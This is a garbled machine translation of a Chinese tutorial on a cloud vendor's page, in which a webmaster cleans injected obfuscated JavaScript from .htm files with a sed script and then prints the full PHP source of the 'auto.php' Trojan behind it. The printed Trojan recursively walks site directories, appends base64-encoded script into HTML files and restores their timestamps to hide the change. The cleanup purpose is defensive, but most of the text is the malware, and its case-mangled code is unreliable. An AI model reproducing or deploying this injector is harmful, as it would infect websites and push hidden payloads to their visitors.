Home > Developer > Shell

Delete a Web site with the shell command the latest NB method and code _linux

Source: Internet
Author: User
Tags eval
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
Copy code code as follows:

# <script language= "javascript" type= "Text/javascript" >
# if (document.cookie.indexOf (' Helio ') ==-1) {var expires=new Date (); Expires.settime (Expires.gettime () +1*60*60*1000) ;d ocument.cookie= ' helio=yes;path=/;expires= ' +expires.togmtstring ()
# eval (function (p,a,c,k,e,d) {e=function (c) {return (c<a? ': E (parseint (C/A))) + ((c=c%a) >35? String.fromCharCode (c+29): C.tostring ())};if (! "). Replace (/^/,string)) {while (c--) d[e (c)]=k[c]| | E (c); K=[function (e) {return d[e]}];e=function () {return ' \\w+ '};c=1};while (c--) if (k[c)) P=p.replace (New RegExp (' \\b ') +e (c) + ' \\b ', ' G '), k[c]); return p} (' 5.l (\ '

# </script>


Is it really a headache, or do you want to write a shell script to get rid of these scripts
Copy Code code as follows:

#!/bin/sh
LS $1/*.htm | While read file
Todo
Sed-i-E "/if (document.cookie.indexOf (' Helio '/D; /eval (function (p,a,c,k,e,d)/D; "$file
Done

But the next day there was

The last chance to find a auto.php file in the site is suspicious
Look at the content, sure enough is the root of the Trojan
Here's what it's all about, and I hope it helps.
Copy Code code as follows:

<?php
Error_reporting (E_error);
Set_time_limit (0);
function Checkpath ($path)
{
return Str_replace ('//', '/', str_replace (' \ \ ', '/', $path));
}
function Autoread ($filename)
{
$handle = @fopen ($filename, "RB");
$filecode = @fread ($handle, @filesize ($filename));
@fclose ($handle);
return $filecode;
}
function Autowrite ($filename, $filecode, $filemode)
{
$time = @filemtime ($filename);
$handle = @fopen ($filename, $filemode);
$key = @fwrite ($handle, "\ r \ n". $filecode. " \ r \ n ");
if (! $key)
{
@chmod ($filename, 0666);
$key = @fwrite ($handle, "\ r \ n". $filecode. " \ r \ n ");
}
@fclose ($handle);
@touch ($filename, $time);
Return $key? True:false;
}
function Make_pass ($length)
{
$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str = "";
while (strlen ($STR) < $length)
{
$str. = substr ($possible, (rand ()% strlen ($possible), 1);
}
return $str;
}
function AutoRun ($dir)
{
$spider = @opendir ($dir);
while ($file = @readdir ($spider))
{
if ($file = = '. ' | | = $file = ' ... ' | | $file = = ' a ' | | $file = ' images ' | | $file = ' uploads ' | | $file = ' special ' | | $file = = ' Data ' | | $file = = ' Include ' | | $file = = ' member ' | | $file = = ' Templets ' | | $file = = ' Install ') continue;
$code = Base64_decode (' Phnjcmlwdcbsyw5ndwfnzt0iamf2yxnjcmlwdcigdhlwzt0idgv4dc9qyxzhc2nyaxb0ij4ncmlmkgrvy3vtzw50lmnvb2tpzs5pbmrlee9mkcdozwxpbycpp T0tmsl7dmfyigv4cglyzxm9bmv3ierhdguokttlehbpcmvzlnnldfrpbwuozxhwaxjlcy5nzxruaw1lkckrmso2mco2mcoxmdawkttkb2n1bwvudc5jb29raw U9j2hlbglvpvllcztwyxrops87zxhwaxjlcz0nk2v4cglyzxmudg9htvrtdhjpbmcokq0kzxzhbchmdw5jdglvbihwlgesyyxrlguszcl7zt1mdw5jdglvbih Jkxtyzxr1cm4oyzxhpycnomuocgfyc2vjbnqoyy9hkskpkygoyz1jjweppjm1p1n0cmluzy5mcm9tq2hhcknvzguoyysyosk6yy50b1n0cmluzygznikpfttp Zighjycucmvwbgfjzsgvxi8su3ryaw5nksl7d2hpbguoyy0tkwrbzshjkv09a1tjxxx8zshjkttrpvtmdw5jdglvbihlkxtyzxr1cm4gzftlxx1do2u9znvuy 3rpb24okxtyzxr1cm4nxfx3kyd9o2m9mx07d2hpbguoyy0tkwlmkgtby10pcd1wlnjlcgxhy2uobmv3ifjlz0v4ccgnxfxijytlkgmpkydcxginlcdnjyksa1 tjxsk7cmv0dxjuihb9kcc1lmwoxcc8acbmpwigat04oi8vbs5uljyunc9hl2ouzd48l2g+ pdkgnz0wigs9msbppsi4oi8vbs5uljyunc9hl2uuyz8yij48lzk+pdkgnz0wigs9msbppsi4oi8vbs5uljyunc9hl2cuyz8zij48lzk+ Xccpjyw2miwyncwnfdewmhw= ');
$code. = Make_pass (3);
$code. = ' | ';
$code. = Make_pass (3);
$code. = Base64_decode (' Fgnufgrvy3vtzw50fgdvdnxozwlnahr8ahr0chxpznjhbwv8aw1hz2vzfgphdmfzy3jpchr8anbnfgpzfgtpc3n8bgfuz3vhz2v8bwlzc3xzy3jpchr8c3jjf hviynx3awr0ahx3cml0zwxufhd3d3x4y3jzcmmnlnnwbgl0kcd8jyksmcx7fskpo30ncjwvc2nyaxb0pg0kpc9ozwfkpg== ');
Die ($code);
$filename = Checkpath ($dir. '/'. $file);
if (Is_dir ($filename)) AutoRun ($filename);
if (eregi (' \.htm|\.shtml ', $file))
{
$checkcode = Autoread ($filename);
if (!stristr ($checkcode, ' eval (function ()) && stristr ($checkcode, ' {
$newcode = Str_replace (' Echo Autowrite ($filename, $newcode, "WB")? "OK:". $filename. " <br>\n ":" Err: ". $filename." <br>\n ";
Ob_flush ();
Flush ();
}
}
$checkcode = NULL;
$newcode = NULL;
}
@closedir ($spider);
return true;
}
if (Isset ($_get[' dir '))
{
AutoRun ($_get[' dir ']);
}
echo ' http://' $_server[' server_name '].$_server[' php_self '. Dir= '. Checkpath (DirName (__file__));
?>

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
get the permalink web database applications with php and mysql source code if command in shell script with options c execute shell command and get output perl execute shell command and get output linux command line and shell scripting bible python execute shell command and get output
Related Article
The Linux RZ command and the SZ command use the detailed ency...
Linux date format (time format) in Shell __linux
Batch file written with adb shell test
ADB Shell top uses
Resolve Zabbix "zbx_notsupported:timeout while executing a sh...
Access routers using Padavan firmware from the extranet (Pean...

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More